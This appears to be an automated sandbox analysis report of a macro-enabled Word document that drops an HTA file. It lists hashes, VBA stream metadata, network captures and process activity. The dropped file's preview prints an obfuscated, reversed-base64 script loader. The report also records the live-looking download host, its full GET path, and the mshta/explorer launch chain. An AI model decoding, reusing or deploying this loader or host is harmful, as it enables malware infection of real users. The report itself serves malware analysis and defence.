                                                                                                                                                        Preview: <html><body><div id='karolYou' style='font-color: #000'>lave</div><div id='tubeGirl' style='font-color: #000'>=YXYyBCZvdXWvVHI9AibldHIBNGdpZXZY9kYqV2Y0hiItNHetxmMugXbshGd0BnIpsDZvdXWvVnLvBXZuhiIHVEViwCIigGd0BnOv8ydp5mcl5Gdhx2cyATM3ImLj9WbvQXZnp3LRJzN3E2R3Y0aOlDcBNWYXRkZGx2ROJUZ1FWcHVGZ4k2LiF2VlhHVR92R5FUQ6xkUvEUVxgVRyJXVxYUa0pmaWhjQCFWU1VWb2UzctFFWZZXek9iN0AjNz8yZ2YmSZx0RIJlVXB3NzFDd2hkbaRmdvg1YqNWWDpmQYhDdQFWQMNHapRUQ4hTNQVUcvMWYiNzPyVmZ9ADdmclePpVP5gXeBlGZOZiezQWOPJGM9U0dBV1aVVlT5h0crZSdzVmc9QjWrlHO54mJjlGZ9IWR1klQPZUeaZ3VIJ2R2lzdQJ3NRZVbmEXPsl1anplTHl1baBXd5ICLgYWYsNXZpsDZvdXWvVnLzVmbkhSK7kmZoQ2b3l1b15yc0FGd1NHI90DIyADMpsHdyl3e2FmcgcWayxGTvZXZg0DIuV2dgE0Y0lmdlh1TipWZjRHKiEGZvRmYuMHdyVWYtJSK7cWayxGTvZXZu8Gcl52Onlmcsx0b2VmL0lHclBSPgEzOnlmcsx0b2VmL3JXa0VGKk92dZ9WduIXZzB3buNXZi9GZ5lyOnlmcsx0b2VmLzFmdlR3bmlGblhiIjpDXcV3clJ3ccxFc1JGbpNGXcR2b35UZ4RnLqB3ZiwCIykyOnlmcsx0b2VmLjx2bzV2O9NWY0NGaoUWK71Xf|||==gdhJHIs9mdlxUarVGI9AibldHIBNGdpZXZY9kYqV2Y0hiI3N3YylGc05ycoVGbsJSK7YXYyByahJ3bsR0b3B1b3BS
                                                                                                                                                        C:\Users\user\Documents\~$ouTube.hta
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):2.144407689125217
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Rl/ZdrlX/ttl+ruBJ/lBlqKbRlt7:RtZtlXCuXcARlB
                                                                                                                                                        MD5:A66D5DB2BD2ED61BAF4E9EDA767F31E9
                                                                                                                                                        SHA1:C822CC47CD77724175A96D15BDBFE8D22F09A75D
                                                                                                                                                        SHA-256:4965D751BA6AB64253C730DC06471B8CBE4E6ECF941CEB76C921FA858DEAE84B
                                                                                                                                                        SHA-512:DD2EA404B1CCE1D0F8600A1875D90FB998C4499C3212D059EDEFF5AE7E0B4F901C4FD6710A7B75F8CC49A4D007CF6D2A12B7B638B3773313CAC4C0F997D37EA3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: .pratesh................................................p.r.a.t.e.s.h.........&.G.............................".K.............H.......6C......>.O.............$...
                                                                                                                                                        C:\Users\user\Documents\~WRD0000.tmp
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3342
                                                                                                                                                        Entropy (8bit):5.787478297876638
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:iOVvcNLnp15eL/XaxaFD1OIWCOrWETgAgQg+jgMo0Y01MDdq:iOVqb5Sa05OIWCSWETgAgQgKgu1o8
                                                                                                                                                        MD5:55D9EAB53D4063A53B6ED05F7B1E75E7
                                                                                                                                                        SHA1:E6B4C81676D3EF0D2F7D08A6CC2AD90EB54908C3
                                                                                                                                                        SHA-256:C7F40608CE8A3DDA25C13D117790D08EF757B07B8C2CCB645A27A71ADC322FB2
                                                                                                                                                        SHA-512:E90768D87C7B191D41D3944957725DB0E1F29FA865E24FD7308656FC9249CA0A5D1BD0ABEDA3BBC68528EFC0CE6BC3A79EB434C375FD5C6EC90455C6E19A74F9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: <html><body><div id='karolYou' style='font-color: #000'>lave</div><div id='tubeGirl' style='font-color: #000'>=YXYyBCZvdXWvVHI9AibldHIBNGdpZXZY9kYqV2Y0hiItNHetxmMugXbshGd0BnIpsDZvdXWvVnLvBXZuhiIHVEViwCIigGd0BnOv8ydp5mcl5Gdhx2cyATM3ImLj9WbvQXZnp3LRJzN3E2R3Y0aOlDcBNWYXRkZGx2ROJUZ1FWcHVGZ4k2LiF2VlhHVR92R5FUQ6xkUvEUVxgVRyJXVxYUa0pmaWhjQCFWU1VWb2UzctFFWZZXek9iN0AjNz8yZ2YmSZx0RIJlVXB3NzFDd2hkbaRmdvg1YqNWWDpmQYhDdQFWQMNHapRUQ4hTNQVUcvMWYiNzPyVmZ9ADdmclePpVP5gXeBlGZOZiezQWOPJGM9U0dBV1aVVlT5h0crZSdzVmc9QjWrlHO54mJjlGZ9IWR1klQPZUeaZ3VIJ2R2lzdQJ3NRZVbmEXPsl1anplTHl1baBXd5ICLgYWYsNXZpsDZvdXWvVnLzVmbkhSK7kmZoQ2b3l1b15yc0FGd1NHI90DIyADMpsHdyl3e2FmcgcWayxGTvZXZg0DIuV2dgE0Y0lmdlh1TipWZjRHKiEGZvRmYuMHdyVWYtJSK7cWayxGTvZXZu8Gcl52Onlmcsx0b2VmL0lHclBSPgEzOnlmcsx0b2VmL3JXa0VGKk92dZ9WduIXZzB3buNXZi9GZ5lyOnlmcsx0b2VmLzFmdlR3bmlGblhiIjpDXcV3clJ3ccxFc1JGbpNGXcR2b35UZ4RnLqB3ZiwCIykyOnlmcsx0b2VmLjx2bzV2O9NWY0NGaoUWK71Xf|||==gdhJHIs9mdlxUarVGI9AibldHIBNGdpZXZY9kYqV2Y0hiI3N3YylGc05ycoVGbsJSK7YXYyByahJ3bsR0b3B1b3BS

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:Microsoft Word 2007+
                                                                                                                                                        Entropy (8bit):7.789270534017578
                                                                                                                                                        TrID:
                                                                                                                                                        • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                                                                                                                                                        • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                                                                                                                                                        • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                                                                                                                                                        • ZIP compressed archive (8000/1) 5.23%
                                                                                                                                                        File name:charge_12.01.2021.doc
                                                                                                                                                        File size:34322
                                                                                                                                                        MD5:18499830201cddade8183b8e24fdf30a
                                                                                                                                                        SHA1:55c498cf7273cab567f49a00c15ca3316c001215
                                                                                                                                                        SHA256:0a42f6762ae4f3b1d95aae0f8977cde6361f1d59b5ccc400c41772db0205f7c5
                                                                                                                                                        SHA512:0a59ed2f3491bbd547d3ae543c6efcf965d1da65c02f900b09d6c75afd92dfc98c4182af7392b9d77b79cf0c17fe30d232449396a3a3be14c96b07ce7718928e
                                                                                                                                                        SSDEEP:768:JouYXWQ6W02VWnZdw9822zARtrLfxl1Isq:mLmxfcWwkyNLfx4
                                                                                                                                                        File Content Preview:PK..........!...O.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                                        Static OLE Info

                                                                                                                                                        General

                                                                                                                                                        Document Type:OpenXML
                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                        OLE File "/opt/package/joesandbox/database/analysis/532355/sample/charge_12.01.2021.doc"

                                                                                                                                                        Indicators

                                                                                                                                                        Has Summary Info:False
                                                                                                                                                        Application Name:unknown
                                                                                                                                                        Encrypted Document:False
                                                                                                                                                        Contains Word Document Stream:
                                                                                                                                                        Contains Workbook/Book Stream:
                                                                                                                                                        Contains PowerPoint Document Stream:
                                                                                                                                                        Contains Visio Document Stream:
                                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                                        Flash Objects Count:
                                                                                                                                                        Contains VBA Macros:True

                                                                                                                                                        Summary

                                                                                                                                                        Title:
                                                                                                                                                        Subject:
                                                                                                                                                        Author:aqbhmx
                                                                                                                                                        Keywords:ath.ebuTuoy
                                                                                                                                                        Template:Normal
                                                                                                                                                        Last Saved By:&#1055;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1100; Windows
                                                                                                                                                        Revion Number:2
                                                                                                                                                        Total Edit Time:0
                                                                                                                                                        Create Time:2021-12-01T11:28:00Z
                                                                                                                                                        Last Saved Time:2021-12-01T11:28:00Z
                                                                                                                                                        Number of Pages:1
                                                                                                                                                        Number of Words:116
                                                                                                                                                        Number of Characters:9905
                                                                                                                                                        Creating Application:Microsoft Office Word
                                                                                                                                                        Security:0

                                                                                                                                                        Document Summary

                                                                                                                                                        Number of Lines:55
                                                                                                                                                        Number of Paragraphs:1
                                                                                                                                                        Thumbnail Scaling Desired:false
                                                                                                                                                        Company:
                                                                                                                                                        Contains Dirty Links:false
                                                                                                                                                        Shared Document:false
                                                                                                                                                        Changed Hyperlinks:false
                                                                                                                                                        Application Version:16.0000

                                                                                                                                                        Streams with VBA

                                                                                                                                                        VBA File Name: ThisDocument.cls, Stream Size: 2131
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/ThisDocument
                                                                                                                                                        VBA File Name:ThisDocument.cls
                                                                                                                                                        Stream Size:2131
                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . " . . . 0 . . . . . . . . . . . . . . . - $ " 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . 1 . , . . . I . C + . . . . . . . 1 . . . . M . . . . , 1 ] \\ . . . . . . . . . . . . . . . . . . . . . 4 . . . . . J . . . . I 9 . : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 4 . . . . . J . . . . I 9 . : . 1 . , . . . I . C + . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:01 16 03 00 06 00 01 00 00 f4 04 00 00 e4 00 00 00 ea 01 00 00 22 05 00 00 30 05 00 00 c0 06 00 00 03 00 00 00 01 00 00 00 2d 24 22 31 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 96 31 f1 2c da ac df 49 b1 43 2b df da 14 fc be e0 d7 31 ff fb e4 a3 4d b5 cc 09 86 2c 31 5d 5c 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        VBA Code
                                                                                                                                                        VBA File Name: main.bas, Stream Size: 1148
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/main
                                                                                                                                                        VBA File Name:main.bas
                                                                                                                                                        Stream Size:1148
                                                                                                                                                        Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - $ . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 a1 03 00 00 00 00 00 00 01 00 00 00 2d 24 9c 41 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        VBA Code

                                                                                                                                                        Streams

                                                                                                                                                        Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 406
                                                                                                                                                        General
                                                                                                                                                        Stream Path:PROJECT
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Stream Size:406
                                                                                                                                                        Entropy:5.30459067678
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:I D = " { 4 C 4 C B 6 7 3 - B F A 3 - 4 F 2 A - A F 5 A - A 6 3 2 A C 7 9 3 7 5 A } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = m a i n . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 F 9 D 8 D 3 0 B 3 5 0 5 6 5 4 5 6 5 4 5 6 5 4 5 6 5 4 " . . D P B = " 3 E 3 C 2 C D 1 5 4 E F F 2 F 0 F 2 F 0 F 2 " . . G C = " D D D F C F 6 E F 1 0 C F 2 0 C F 2 F 3 " . . . . [
                                                                                                                                                        Data Raw:49 44 3d 22 7b 34 43 34 43 42 36 37 33 2d 42 46 41 33 2d 34 46 32 41 2d 41 46 35 41 2d 41 36 33 32 41 43 37 39 33 37 35 41 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 6d 61 69 6e 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56
                                                                                                                                                        Stream Path: PROJECTwm, File Type: data, Stream Size: 56
                                                                                                                                                        General
                                                                                                                                                        Stream Path:PROJECTwm
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:56
                                                                                                                                                        Entropy:3.05665670746
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . m a i n . m . a . i . n . . . . .
                                                                                                                                                        Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 6d 61 69 6e 00 6d 00 61 00 69 00 6e 00 00 00 00 00
                                                                                                                                                        Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2864
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:2864
                                                                                                                                                        Entropy:4.29981377884
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                                                                                                                                        Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                        Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 1667
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/__SRP_0
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:1667
                                                                                                                                                        Entropy:3.52769533528
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . O - . . % . J . i . . x - a ] . . . . . . . . . . .
                                                                                                                                                        Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                                                                                                                                                        Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 232
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/__SRP_1
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:232
                                                                                                                                                        Entropy:2.20499301264
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y o u D o o r N e x t . . . . . . . . . . . . . . . . y o u L o a d X . . . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
                                                                                                                                                        Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 799
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/__SRP_2
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:799
                                                                                                                                                        Entropy:1.96552857808
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 03 00 03 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
                                                                                                                                                        Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 314
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/__SRP_3
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:314
                                                                                                                                                        Entropy:2.19683844969
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . X . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 40 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 04 01 e1 0d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                                        Stream Path: VBA/dir, File Type: data, Stream Size: 552
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/dir
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:552
                                                                                                                                                        Entropy:6.3505975093
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:. $ . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . t . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . .
                                                                                                                                                        Data Raw:01 24 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 f6 74 a0 63 0d 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

                                                                                                                                                        Network Behavior

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Dec 2, 2021 04:27:03.028362989 CET4974580192.168.2.3194.62.42.207
                                                                                                                                                        Dec 2, 2021 04:27:03.107618093 CET8049745194.62.42.207192.168.2.3
                                                                                                                                                        Dec 2, 2021 04:27:03.107745886 CET4974580192.168.2.3194.62.42.207
                                                                                                                                                        Dec 2, 2021 04:27:03.108318090 CET4974580192.168.2.3194.62.42.207
                                                                                                                                                        Dec 2, 2021 04:27:03.187299967 CET8049745194.62.42.207192.168.2.3
                                                                                                                                                        Dec 2, 2021 04:27:03.621062040 CET8049745194.62.42.207192.168.2.3
                                                                                                                                                        Dec 2, 2021 04:27:03.623538017 CET4974580192.168.2.3194.62.42.207
                                                                                                                                                        Dec 2, 2021 04:27:06.851485968 CET4974580192.168.2.3194.62.42.207

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Dec 2, 2021 04:27:02.987498045 CET5415453192.168.2.38.8.8.8
                                                                                                                                                        Dec 2, 2021 04:27:03.016952038 CET53541548.8.8.8192.168.2.3

                                                                                                                                                        DNS Queries

                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                        Dec 2, 2021 04:27:02.987498045 CET192.168.2.38.8.8.80x942fStandard query (0)winrentals2017b.comA (IP address)IN (0x0001)

                                                                                                                                                        DNS Answers

                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                        Dec 2, 2021 04:27:03.016952038 CET8.8.8.8192.168.2.30x942fNo error (0)winrentals2017b.com194.62.42.207A (IP address)IN (0x0001)

                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                        • winrentals2017b.com

                                                                                                                                                        HTTP Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        0192.168.2.349745194.62.42.20780C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 2, 2021 04:27:03.108318090 CET1237OUTGET /tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBaQuem65smQXYvyd/64063/g6fJYLGHRVWp7s1tvHnZdv/XcjcYCjBX8tPaALshiDAx85PEq/cab3?ref=0t&WzOZ=9xyAidN&z3d9Ob0=EwAUkUUNyHsk&user=4Zky89n&cid=bE5YBOFyZvWHbGv9wPr7QVm&q=lYkgZNGYoZpu9 HTTP/1.1
                                                                                                                                                        Accept: */*
                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                        Host: winrentals2017b.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Dec 2, 2021 04:27:03.621062040 CET1237INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 02 Dec 2021 03:27:03 GMT
                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                                                                                                                        X-Powered-By: PHP/7.2.34
                                                                                                                                                        Content-Length: 203
                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 63 61 62 33 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "cab3" was not found on this server.</p></body></html>


                                                                                                                                                        Code Manipulations

                                                                                                                                                        Statistics

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        Analysis Process: WINWORD.EXE PID: 7128 Parent PID: 744

                                                                                                                                                        General

                                                                                                                                                        Start time:04:26:52
                                                                                                                                                        Start date:02/12/2021
                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                        Imagebase:0xe70000
                                                                                                                                                        File size:1937688 bytes
                                                                                                                                                        MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Analysis Process: explorer.exe PID: 4756 Parent PID: 7128

                                                                                                                                                        General

                                                                                                                                                        Start time:04:26:59
                                                                                                                                                        Start date:02/12/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:explorer youTube.hta
                                                                                                                                                        Imagebase:0xc00000
                                                                                                                                                        File size:3611360 bytes
                                                                                                                                                        MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                        Has elevated privileges:true
